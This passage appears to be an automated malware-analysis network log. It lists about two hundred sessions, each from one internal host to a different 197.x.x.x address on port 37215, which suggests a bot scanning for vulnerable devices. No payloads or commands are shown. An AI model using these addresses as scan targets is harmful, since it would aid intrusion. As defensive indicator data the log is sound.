                                                                            9112192.168.2.1537904197.235.101.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9113192.168.2.1537024197.96.211.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9114192.168.2.1549414197.20.238.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9115192.168.2.1550078197.71.147.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9116192.168.2.1537332197.29.85.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9117192.168.2.1539694197.184.148.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9118192.168.2.1536846197.161.139.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9119192.168.2.1538146197.58.76.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9120192.168.2.1550218197.110.56.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9121192.168.2.1534584197.63.29.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9122192.168.2.1558520197.138.210.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9123192.168.2.1553122197.227.151.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9124192.168.2.1537802197.48.173.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9125192.168.2.1545366197.4.208.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9126192.168.2.1537390197.189.158.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9127192.168.2.1542438197.39.20.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9128192.168.2.1539240197.43.247.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9129192.168.2.1547632197.55.77.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9130192.168.2.1551490197.125.16.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9131192.168.2.1558826197.45.253.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9132192.168.2.1551390197.242.41.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9133192.168.2.1540798197.79.228.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9134192.168.2.1537546197.66.106.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9135192.168.2.1546412197.191.218.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9136192.168.2.1537516197.22.76.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9137192.168.2.1541402197.182.75.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9138192.168.2.1548202197.71.140.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9139192.168.2.1556720197.111.73.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9140192.168.2.1535990197.176.87.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9141192.168.2.1547296197.58.249.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9142192.168.2.1540062197.187.37.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9143192.168.2.1541228197.138.118.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9144192.168.2.1549418197.160.147.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9145192.168.2.1558708197.229.71.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9146192.168.2.1557296197.62.209.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9147192.168.2.1556328197.156.157.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9148192.168.2.1554888197.166.192.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9149192.168.2.1540338197.30.125.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9150192.168.2.1550396197.156.80.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9151192.168.2.1558534197.219.80.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9152192.168.2.1552216197.255.46.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9153192.168.2.1552732197.189.68.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9154192.168.2.1559872197.63.252.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9155192.168.2.1560420197.208.233.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9156192.168.2.1552712197.141.251.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9157192.168.2.1534580197.188.52.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9158192.168.2.1538414197.83.229.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9159192.168.2.1560774197.213.30.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9160192.168.2.1538320197.66.248.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9161192.168.2.1546954197.146.200.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9162192.168.2.1554446197.159.60.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9163192.168.2.1534468197.254.198.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9164192.168.2.1544394197.199.211.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9165192.168.2.1547664197.164.220.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9166192.168.2.1553276197.129.220.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9167192.168.2.1560348197.206.6.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9168192.168.2.1553322197.132.204.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9169192.168.2.1555086197.238.111.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9170192.168.2.1549538197.228.83.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9171192.168.2.1554210197.104.243.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9172192.168.2.1533692197.138.39.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9173192.168.2.1557404197.105.4.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9174192.168.2.1546206197.247.7.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9175192.168.2.1534372197.7.22.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9176192.168.2.1535616197.88.170.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9177192.168.2.1557478197.146.217.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9178192.168.2.1536020197.173.111.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9179192.168.2.1549376197.28.250.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9180192.168.2.1552264197.226.63.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9181192.168.2.1537658197.12.52.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9182192.168.2.1552890197.149.130.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9183192.168.2.1538844197.226.175.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9184192.168.2.1558570197.145.95.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9185192.168.2.1556490197.160.66.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9186192.168.2.1558040197.214.88.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9187192.168.2.1553058197.128.230.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9188192.168.2.1546960197.22.104.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9189192.168.2.1541870197.170.217.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9190192.168.2.1549114197.207.207.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9191192.168.2.1534824197.220.243.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9192192.168.2.1553266197.204.40.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9193192.168.2.1555920197.71.201.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9194192.168.2.1553904197.119.139.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9195192.168.2.1546326197.118.13.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9196192.168.2.1558592197.203.61.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9197192.168.2.1537794197.224.142.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9198192.168.2.1555974197.219.35.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9199192.168.2.1535078197.230.248.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9200192.168.2.1549318197.200.237.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9201192.168.2.1534164197.89.141.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9202192.168.2.1535632197.198.240.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9203192.168.2.1537618197.43.157.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9204192.168.2.1545882197.249.62.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9205192.168.2.1549114197.4.29.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9206192.168.2.1557746197.36.77.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9207192.168.2.1548536197.148.134.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9208192.168.2.1541384197.56.113.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9209192.168.2.1555104197.173.230.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9210192.168.2.1542264197.183.102.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9211192.168.2.1546590197.113.88.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9212192.168.2.1555046197.15.86.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9213192.168.2.1557626197.27.158.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9214192.168.2.1549496197.111.62.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9215192.168.2.1554418197.227.197.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9216192.168.2.1543080197.212.181.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9217192.168.2.1535774197.234.178.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9218192.168.2.1544862197.172.173.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9219192.168.2.1546166197.245.105.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9220192.168.2.1547766197.67.161.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9221192.168.2.1549070197.154.130.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9222192.168.2.1558884197.186.109.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9223192.168.2.1539298197.234.196.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9224192.168.2.1546944197.112.78.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9225192.168.2.1556550197.139.182.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9226192.168.2.1555368197.113.92.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9227192.168.2.1548050197.146.220.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9228192.168.2.1541966197.128.203.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9229192.168.2.1557164197.180.137.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9230192.168.2.1560986197.101.60.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9231192.168.2.1536280197.167.76.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9232192.168.2.1536332197.176.8.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9233192.168.2.1544454197.205.205.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9234192.168.2.1552238197.55.0.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9235192.168.2.1551206197.218.57.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9236192.168.2.1535808197.153.178.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9237192.168.2.1553054197.57.210.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9238192.168.2.1543130197.253.94.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9239192.168.2.1538314197.38.36.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9240192.168.2.1545344197.125.14.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9241192.168.2.1543218197.1.104.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9242192.168.2.1555638197.226.219.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9243192.168.2.1545452197.163.133.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9244192.168.2.1539024197.227.138.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9245192.168.2.1535732197.196.253.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9246192.168.2.1553550197.133.194.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9247192.168.2.1552542197.33.96.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9248192.168.2.1543278197.192.138.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9249192.168.2.1546380197.169.14.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9250192.168.2.1553184197.49.64.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9251192.168.2.1538948197.241.4.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9252192.168.2.1556862197.117.106.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9253192.168.2.1558552197.237.199.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9254192.168.2.1542948197.126.22.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9255192.168.2.1551712197.164.246.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9256192.168.2.1559528197.185.188.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9257192.168.2.1542130197.16.192.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9258192.168.2.1560994197.253.82.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9259192.168.2.1545536197.227.157.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9260192.168.2.1542306197.24.68.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9261192.168.2.1550476197.60.75.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9262192.168.2.1540054197.184.223.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9263192.168.2.1549676197.136.46.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9264192.168.2.1533576197.36.132.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9265192.168.2.1550370197.26.101.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9266192.168.2.1533308197.219.120.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9267192.168.2.1554270197.119.170.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9268192.168.2.1547928197.193.190.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9269192.168.2.1547736197.226.160.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9270192.168.2.1533246197.164.146.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9271192.168.2.1545100197.179.231.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9272192.168.2.1533008197.201.210.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9273192.168.2.1551292197.147.207.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9274192.168.2.1560124197.141.115.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9275192.168.2.1545902197.98.90.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9276192.168.2.1534548197.178.153.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9277192.168.2.1556120197.254.255.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9278192.168.2.1551492197.90.3.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9279192.168.2.1553872197.11.184.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9280192.168.2.1544052197.169.118.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9281192.168.2.1545802197.20.39.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9282192.168.2.1551516197.105.252.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9283192.168.2.1554300197.39.246.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9284192.168.2.1560480197.69.239.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9285192.168.2.1539956197.62.68.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9286192.168.2.1541190197.162.10.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9287192.168.2.1540466197.179.87.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9288192.168.2.1551044197.96.114.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9289192.168.2.1545232197.29.4.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9290192.168.2.1536702197.141.182.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9291192.168.2.1534742197.30.190.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9292192.168.2.1551662197.12.234.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9293192.168.2.1552870197.85.4.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9294192.168.2.1556856197.215.209.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9295192.168.2.1555514197.180.86.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9296192.168.2.1546922197.11.136.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9297192.168.2.1533590197.246.127.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9298192.168.2.1555682197.227.241.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9299192.168.2.1548274197.9.239.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9300192.168.2.1546978197.117.20.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9301192.168.2.1538546197.99.220.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9302192.168.2.1543180197.122.61.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9303192.168.2.1538128197.153.188.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9304192.168.2.1547628197.151.54.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9305192.168.2.1544924197.141.59.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9306192.168.2.1546428197.119.120.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9307192.168.2.1560878197.191.171.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9308192.168.2.1552934197.76.214.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9309192.168.2.1543784197.55.101.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9310192.168.2.1560042197.250.199.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9311192.168.2.1551418197.237.121.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
